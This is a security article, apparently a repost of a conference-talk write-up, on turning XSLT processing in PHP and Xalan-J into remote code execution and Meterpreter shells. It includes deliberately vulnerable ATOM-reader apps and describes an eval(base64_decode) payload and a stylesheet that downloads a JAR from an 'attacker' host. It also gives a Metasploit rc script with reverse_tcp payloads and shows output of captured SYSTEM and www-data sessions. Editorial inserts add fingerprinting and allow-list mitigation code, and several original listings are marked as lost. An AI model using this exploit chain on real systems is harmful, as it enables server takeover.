This article will describe how to execute high-level code during
the processing of an XSL transform, with the goal of obtaining some
Meterpreter shells. It applies to any XSLT engine capable of
executing high-level code, even if the published code focuses on PHP5
(in a non-default configuration) and Xalan-J.

Two minimalist applications processing arbitrary XML documents
and XSLT stylesheets are used as the targets. Functionally, these
applications are minimalist online readers for ATOM feeds. They
were used during my HackInTheBox and HackInParis talks and are now
publicly available.
The PHP code:
```php
<?php
// Output the HTML header
echo "<html>\n";
echo "<head>\n";
echo "<title>ATOM reader (PHP + XSLT)</title>\n";
echo "</head>\n";
echo "<body>\n";
echo "This ATOM reader is coded in PHP5+XSLT, using libxslt.<br/>\n";

// Get parameters
$url = $_GET['url'];
$xsl = $_GET['xsl'];

// Load ATOM file
$xmldoc = new DOMDocument();
$xmldoc->load( $url );

// Load XSLT file
$xsldoc = new DOMDocument();
$xsldoc->load( $xsl );

// Register PHP functions as XSLT extensions
$xslt = new XSLTProcessor();
$xslt->registerPhpFunctions();

// Import the stylesheet
$xslt->importStylesheet( $xsldoc );

// Transform and print
print $xslt->transformToXML( $xmldoc );

?>
```
You may notice on line 24 a call to XSLTProcessor::registerPhpFunctions()
(the `$xslt->registerPhpFunctions();` statement). This is
the non-default setting that we will exploit. From the
documentation: "PHP 5 >= 5.0.4 / Enables the ability to use
PHP functions as XSLT functions".
The Java code:
```jsp
<%@ page import="javax.xml.transform.*" %>
<%@ page import="javax.xml.transform.stream.*" %>

<%
// Output the header (the original header text was lost in extraction; this line is a reconstruction)
out.println("This ATOM reader is coded in JSP+XSLT, using Xalan-J.<br/>");

// Get the parameters
String xmlFile = request.getParameter("url");
String xslFile = request.getParameter("xsl");

// Create a XSLT transformer
TransformerFactory tFactory = TransformerFactory.newInstance();

// Configure the XSLT stylesheet
Transformer transformer = tFactory.newTransformer(new StreamSource(xslFile));

// Transform the XML file
transformer.transform(new StreamSource(xmlFile), new StreamResult(out));
%>
```
In both applications, the "url" parameter contains the URL of an
ATOM feed (for example http://www.us-cert.gov/channels/current.atom). The
"xsl" parameter contains the URL of the XSL style sheet we want to
apply to the XML document.
The following one displays some basic information about the feed
and its entries:
(stylesheet listing lost in extraction; it printed the feed information and, for each entry, a line of the form "Entry #N [ ] :" followed by the entry details)

Here's a screenshot of the output (using the US-CERT feed):
OK, everything is now in order. Let's try to execute some more
interesting XSLT code, for example in order to identify the
underlying XSLT engine:

(stylesheet listing lost in extraction; it printed "Detecting the underlying XSLT engine ..." followed by three lines labelled "Version:", "Vendor:" and "Vendor URL:")

The output under PHP5:

The output under Tomcat+Xalan-J:
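The fingerprinting stylesheet above did not survive extraction, so here is an added example (not code from the original article) of how the three labelled lines are obtained: the XSLT 1.0 `system-property()` function, run through PHP's XSLTProcessor without `registerPhpFunctions()`, so that nothing beyond core XSLT is reachable. The stylesheet and the input feed are constructed for this example; the stylesheet itself is engine-independent and would run unchanged under Xalan-J.

```php
<?php
// Added example, not from the original article: fingerprint the XSLT engine
// with the standard XSLT 1.0 system-property() function. No PHP functions are
// registered, so the stylesheet can only use core XSLT.

// Constructed stylesheet: every XSLT 1.0 engine must answer these three properties.
$fingerprintXsl = <<<'XSL'
<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:output method="text"/>
  <xsl:template match="/">
    <xsl:text>Detecting the underlying XSLT engine ...&#10;</xsl:text>
    <xsl:text>Version:    </xsl:text>
    <xsl:value-of select="system-property('xsl:version')"/>
    <xsl:text>&#10;Vendor:     </xsl:text>
    <xsl:value-of select="system-property('xsl:vendor')"/>
    <xsl:text>&#10;Vendor URL: </xsl:text>
    <xsl:value-of select="system-property('xsl:vendor-url')"/>
    <xsl:text>&#10;</xsl:text>
  </xsl:template>
</xsl:stylesheet>
XSL;

// Constructed input document: the stylesheet never reads it, so any well-formed XML will do.
$inputXml = '<feed xmlns="http://www.w3.org/2005/Atom"><title>constructed sample feed</title></feed>';

function fingerprintEngine(string $xsl, string $xml): string
{
    $xsldoc = new DOMDocument();
    $xsldoc->loadXML($xsl);

    $xmldoc = new DOMDocument();
    $xmldoc->loadXML($xml);

    $proc = new XSLTProcessor();
    // Deliberately no registerPhpFunctions(): only core XSLT is available to the stylesheet.
    $proc->importStylesheet($xsldoc);

    return (string) $proc->transformToXML($xmldoc);
}

echo fingerprintEngine($fingerprintXsl, $inputXml);
```

libxslt (behind PHP) and Xalan-J each answer with their own vendor name and URL, which is exactly the difference the two screenshots show. From the defender's side, a client-supplied stylesheet that queries `system-property('xsl:vendor')` against an endpoint like these readers is worth logging: the vendor string decides which extension namespace the next request will try, so the probe is an early indicator that precedes any engine-specific call.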
Now, some basic high-level code displaying the current date. For
this, we need to use the right namespace. For PHP, it's
"http://php.net/xsl" and for Xalan-J, it's
"http://xml.apache.org/xalan/java/java.*".

In PHP:

(stylesheet listing lost in extraction; it printed "Current date:" followed by the result of a php:function() call)

In Java:

(stylesheet listing lost in extraction; it printed "Current date:" followed by the result of a Xalan Java extension call)

In order to execute arbitrary PHP code, we can try to use
eval(), include() or require(). But those aren't PHP functions, they are
language constructs. Luckily, both preg_replace() and assert() are
PHP functions and can be used to execute arbitrary PHP code. We now
have everything needed to execute a PHP Meterpreter:

(stylesheet listing lost in extraction; it passed eval(base64_decode('Base64-encoded Meterpreter code')) to one of those functions)

We are done regarding PHP!
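The PHP reader is exploitable because `registerPhpFunctions()` is called with no argument, which exposes every PHP function (including `assert()` and `preg_replace()`) to the stylesheet. As an added example that is not part of the original article, the following script keeps the "current date" use-case working while closing that hole: `registerPhpFunctions()` is given an explicit allow-list, so a stylesheet asking for any other function is refused by the engine. The stylesheet template, the input feed and the allow-list contents are constructed for this example.

```php
<?php
// Added example, not from the original article: the same XSLTProcessor setup
// as the vulnerable reader, but registerPhpFunctions() receives an allow-list.
// Only the listed PHP functions are reachable through the http://php.net/xsl
// namespace; any other name makes PHP emit a "not allowed to call handler"
// warning and the xsl:value-of evaluates to an empty string.

// Constructed allow-list: what the ATOM reader legitimately needs from PHP.
const ALLOWED_XSLT_FUNCTIONS = ['date', 'strtoupper'];

function runRestricted(string $xsl, string $xml): string
{
    $xsldoc = new DOMDocument();
    $xsldoc->loadXML($xsl);

    $xmldoc = new DOMDocument();
    $xmldoc->loadXML($xml);

    $proc = new XSLTProcessor();
    // The fix: restrict which PHP functions XSLT may invoke instead of exposing all of them.
    $proc->registerPhpFunctions(ALLOWED_XSLT_FUNCTIONS);
    $proc->importStylesheet($xsldoc);

    return (string) $proc->transformToXML($xmldoc);
}

// Constructed stylesheet template: calls one PHP function through the php: namespace.
function stylesheetCalling(string $phpFunction, string $argument): string
{
    return <<<XSL
<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
                xmlns:php="http://php.net/xsl">
  <xsl:output method="text"/>
  <xsl:template match="/">
    <xsl:value-of select="php:function('{$phpFunction}', '{$argument}')"/>
  </xsl:template>
</xsl:stylesheet>
XSL;
}

// Constructed input document; the stylesheet does not read it.
$inputXml = '<feed xmlns="http://www.w3.org/2005/Atom"><title>constructed sample feed</title></feed>';

// 1. Allowed: a listed function works as before.
echo runRestricted(stylesheetCalling('strtoupper', 'still works'), $inputXml), "\n";

// 2. Refused: a function outside the allow-list is never called; PHP warns
//    that the handler is not allowed and the output line stays empty.
echo runRestricted(stylesheetCalling('phpversion', ''), $inputXml), "\n";
```

The allow-list is a mitigation for the extension mechanism only; the underlying design flaw in both readers is that the stylesheet URL comes from the client, and the safest fix is to ship a fixed stylesheet and not call `registerPhpFunctions()` at all. The Java counterpart of the allow-list is to enable `XMLConstants.FEATURE_SECURE_PROCESSING` on the `TransformerFactory`, which makes Xalan-J (and the JDK's bundled XSLTC) reject extension functions such as the `xalan/java` namespace used later in this article.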
We'll now look at Java, where it is much more complex to go from
printing the current date to executing arbitrary classes. In fact,
we'll need to use reflection in order to access enough interesting
Java features to download a remote Meterpreter JAR file. There are
three ways to use reflection:

1) Create your own Java code accessing the key Java features (and keep this code portable across versions). That's too hard for me!

2) Use Javapayload to dynamically construct the Java code. The problem is that Metasploit doesn't include a very recent version of Javapayload. But that's fine if you're doing everything by hand.

3) Use a well-tested and static Java template having all the needed features and re-use it.

In the current scenario, we'll take the third option (thanks @mihi42) in order to integrate nicely with Metasploit.
The resulting XSL style sheet is complex, but works perfectly:

(stylesheet listing lost in extraction; it embedded the URL http://attacker/eviljava/wkaLrNQj.jar together with base64-encoded serialized Java objects, and ended by printing "Test Complete!")

If we put all this logic in a dedicated Metasploit module, we
end up with "generic_xslt_payloads.rb". This module is not
available in trunk for the moment but you can download it from ticket #6784. Copy it to
"modules/exploits/multi/misc/" and configure it using the following
rc script:

```
# Load the module
use exploit/multi/misc/generic_xslt_payloads

# Configure and start the PHP version
set TARGET 0
set URIPATH evilphp.xsl
set PAYLOAD php/meterpreter/reverse_tcp
set SRVHOST 192.168.2.218
set SRVPORT 5001
set LHOST 192.168.2.218
set LPORT 4001
exploit -j

# Configure and start the Java version
set TARGET 1
set URIPATH eviljava
set PAYLOAD java/meterpreter/reverse_tcp
set SRVHOST 192.168.2.218
set SRVPORT 5002
set LHOST 192.168.2.218
set LPORT 4002
exploit -j
```

You should get two jobs running:

```
msf exploit(generic_xslt_payloads) > jobs -l -v

Jobs
====

  Id  Name                                       Payload                       LPORT  URIPATH       Start Time
  --  ----                                       -------                       -----  -------       ----------
  0   Exploit: multi/misc/generic_xslt_payloads  php/meterpreter/reverse_tcp   4001   /evilphp.xsl  Mon Jul 02 18:45:39 +0200 2012
  1   Exploit: multi/misc/generic_xslt_payloads  java/meterpreter/reverse_tcp  4002   /eviljava     Mon Jul 02 18:45:39 +0200 2012
```

Then provide the link to the corresponding XSLT code to the
vulnerable applications, and voilà !

```
msf exploit(generic_xslt_payloads) > sessions -l

Active sessions
===============

  Id  Type                   Information            Connection
  --  ----                   -----------            ----------
  1   meterpreter java/java  SYSTEM @ box08         192.168.2.218:4002 -> 192.168.2.108:1707 (192.168.2.108)
  2   meterpreter php/php    www-data (33) @ box13  192.168.2.218:4001 -> 192.168.2.113:43398 (192.168.2.113)
```

0wn3d !
It should be noted that 1) porting the Java version from Xalan-J
to Saxon should be trivial, and 2) some client-side software such as
XMLSpy allows executing Java code from XSLT. The Metasploit module
was demonstrated during the HackInTheBox conference in Amsterdam,
and the video is available on YouTube (this demo starts at minute 48).
Article source: lcx.cc: From XSLT code execution to Meterpreter shells